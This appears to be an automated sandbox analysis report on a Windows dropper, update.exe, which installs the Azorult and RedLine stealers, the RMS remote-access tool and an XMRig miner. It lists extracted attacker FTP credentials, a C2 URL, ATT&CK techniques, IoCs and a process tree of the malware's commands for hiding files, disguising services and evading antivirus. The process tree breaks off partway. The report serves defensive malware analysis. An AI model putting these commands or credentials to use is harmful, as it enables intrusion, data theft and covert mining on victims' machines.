azorult | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
1805s
max time network
1817s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe

Score

10^/10

azorult redline rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.141.184.35
Port:
21
Username:
alex
Password:
easypassword

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.91
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\system.exe	family_redline
C:\ProgramData\WindowsTask\system.exe	family_redline

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
behavioral32/memory/4332-429-0x00007FF69E470000-0x00007FF69EA10000-memory.dmp	xmrig

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exeupdate.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE 39 IoCs

Processes:

wini.exewinit.execheat.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exetaskhostw.exeR8.exeRar.exeutorrent.exeupdate.exeazur.exetaskhost.exeRDPWInst.exesystem.exeRDPWinst.exeRDPWInst.exewinlogon.exeaudiodg.exeMicrosoftHost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhost.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exe

pid	process
4028	wini.exe
2924	winit.exe
1376	cheat.exe
3272	taskhost.exe
3456	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
4596	taskhostw.exe
948	R8.exe
5024	Rar.exe
4960	utorrent.exe
2224	update.exe
4788	azur.exe
400	taskhost.exe
4844	RDPWInst.exe
4200	system.exe
4920	RDPWinst.exe
4772	RDPWInst.exe
4248	winlogon.exe
3184	audiodg.exe
4332	MicrosoftHost.exe
4984	taskhostw.exe
1260	taskhostw.exe
4436	taskhostw.exe
2868	taskhostw.exe
2036	taskhostw.exe
4648	taskhost.exe
1852	taskhostw.exe
5084	taskhostw.exe
3732	taskhostw.exe
1272	taskhostw.exe
1432	taskhostw.exe
1048	taskhostw.exe
1068	taskhostw.exe
1724	taskhostw.exe
3196	taskhostw.exe
1624	taskhostw.exe
1360	taskhostw.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\ProgramData\install\utorrent.exe	upx
C:\Programdata\Install\utorrent.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
C:\Programdata\WindowsTask\winlogon.exe	upx

Loads dropped DLL 6 IoCs

Processes:

azur.exe

pid process

4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe
4788 azur.exe

pid	process
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe
4788	azur.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4488	icacls.exe
5076	icacls.exe
4244	icacls.exe
4404	icacls.exe
4720	icacls.exe
5088	icacls.exe
4368	icacls.exe
860	icacls.exe
5112	icacls.exe
4580	icacls.exe
4356	icacls.exe
4652	icacls.exe
4064	icacls.exe
4420	icacls.exe
4300	icacls.exe
4392	icacls.exe
4156	icacls.exe
4212	icacls.exe
4228	icacls.exe
4656	icacls.exe
4480	icacls.exe
4132	icacls.exe
3868	icacls.exe
4148	icacls.exe
4468	icacls.exe
4640	icacls.exe
4572	icacls.exe
208	icacls.exe
4384	icacls.exe
4680	icacls.exe
2128	icacls.exe
4808	icacls.exe
4988	icacls.exe
348	icacls.exe
4864	icacls.exe
4660	icacls.exe
4688	icacls.exe
4388	icacls.exe
5056	icacls.exe
3856	icacls.exe
4892	icacls.exe
5080	icacls.exe
4704	icacls.exe
4744	icacls.exe
4668	icacls.exe
4448	icacls.exe
4760	icacls.exe
4604	icacls.exe
4812	icacls.exe
4220	icacls.exe
4540	icacls.exe
4348	icacls.exe
4872	icacls.exe
4976	icacls.exe
4992	icacls.exe
5052	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

taskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ip-api.com
56 checkip.amazonaws.com

flow	ioc
23	ip-api.com
56	checkip.amazonaws.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

RDPWInst.exeupdate.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe

Drops file in System32 directory 5 IoCs

Processes:

rutserv.exetaskhost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe

Drops file in Program Files directory 26 IoCs

Processes:

update.exeutorrent.exeRDPWInst.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

azur.exewinit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4980 schtasks.exe
4824 schtasks.exe
2176 schtasks.exe
3940 schtasks.exe
3160 schtasks.exe
3224 schtasks.exe
1524 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

5044 timeout.exe
4136 timeout.exe
4800 timeout.exe
4176 timeout.exe
756 timeout.exe
3700 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4968 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4192 taskkill.exe
3776 taskkill.exe
4164 taskkill.exe

pid	process
4980	schtasks.exe
4824	schtasks.exe
2176	schtasks.exe
3940	schtasks.exe
3160	schtasks.exe
3224	schtasks.exe
1524	schtasks.exe

pid	process
5044	timeout.exe
4136	timeout.exe
4800	timeout.exe
4176	timeout.exe
756	timeout.exe
3700	timeout.exe

pid	process
4968	ipconfig.exe

pid	process
4192	taskkill.exe
3776	taskkill.exe
4164	taskkill.exe

Modifies registry class 6 IoCs

Processes:

winit.exeR8.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe

NTFS ADS 3 IoCs

Processes:

taskhost.exeupdate.exeutorrent.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	utorrent.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1616 regedit.exe
1036 regedit.exe
Runs net.exe

pid	process
1616	regedit.exe
1036	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

pid	process
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
648	update.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
3456	rutserv.exe
2320	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe
2924	winit.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskhostw.exetaskhost.exe

pid process

4596 taskhostw.exe
400 taskhost.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
4596	taskhostw.exe
400	taskhost.exe

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exesystem.exeRDPWInst.exeRDPWinst.exesvchost.exeMicrosoftHost.exe

description	pid	process
Token: SeDebugPrivilege	3456	rutserv.exe
Token: SeDebugPrivilege	580	rutserv.exe
Token: SeTakeOwnershipPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	3776	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	4200	system.exe
Token: SeDebugPrivilege	4844	RDPWInst.exe
Token: SeDebugPrivilege	4920	RDPWinst.exe
Token: SeAuditPrivilege	4536	svchost.exe
Token: SeLockMemoryPrivilege	4332	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	4332	MicrosoftHost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

update.exe

pid process

2224 update.exe
2224 update.exe
2224 update.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

update.exe

pid process

2224 update.exe
2224 update.exe
2224 update.exe

pid	process
2224	update.exe
2224	update.exe
2224	update.exe

pid	process
2224	update.exe
2224	update.exe
2224	update.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

winit.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeupdate.exe

pid	process
2924	winit.exe
3272	taskhost.exe
3456	rutserv.exe
2320	rutserv.exe
580	rutserv.exe
3152	rutserv.exe
4588	WinMail.exe
4568	WinMail.exe
4596	taskhostw.exe
948	R8.exe
2224	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

update.exewini.exeWScript.execmd.execheat.execmd.execmd.execmd.exe

description	pid	process	target process
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 648 wrote to memory of 4028	648	update.exe	wini.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2916	4028	wini.exe	WScript.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 4028 wrote to memory of 2924	4028	wini.exe	winit.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 648 wrote to memory of 1376	648	update.exe	cheat.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 1380	2916	WScript.exe	cmd.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1616	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 1036	1380	cmd.exe	regedit.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1380 wrote to memory of 3700	1380	cmd.exe	timeout.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 1376 wrote to memory of 3272	1376	cheat.exe	taskhost.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 2176	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3940	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3160	648	update.exe	schtasks.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 3456	1380	cmd.exe	rutserv.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 3224	648	update.exe	schtasks.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 1508	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 648 wrote to memory of 4016	648	update.exe	cmd.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1508 wrote to memory of 2164	1508	cmd.exe	sc.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 1380 wrote to memory of 2320	1380	cmd.exe	rutserv.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 4016 wrote to memory of 1968	4016	cmd.exe	sc.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 648 wrote to memory of 1188	648	update.exe	cmd.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1188 wrote to memory of 2528	1188	cmd.exe	sc.exe
PID 1380 wrote to memory of 580	1380	cmd.exe	rutserv.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

748 attrib.exe
3584 attrib.exe
4140 attrib.exe
4224 attrib.exe
4208 attrib.exe

pid	process
748	attrib.exe
3584	attrib.exe
4140	attrib.exe
4224	attrib.exe
4208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:648

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:1616

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:1036

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:3700

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3456

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2320

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:580

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:748

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:3584

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:2152

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:2776

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:2192

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2924

C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
4⤵
- Suspicious use of SetWindowsHookEx
PID:4588

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
5⤵
- Suspicious use of SetWindowsHookEx
PID:4568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
4⤵
PID:4840

C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:5044

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1376

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:3272

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4596

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:948

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
6⤵
- Modifies registry class
PID:504

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:4136

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:4852

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:5024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4800

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:4236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
8⤵
PID:4364

C:\Windows\SysWOW64\reg.exe
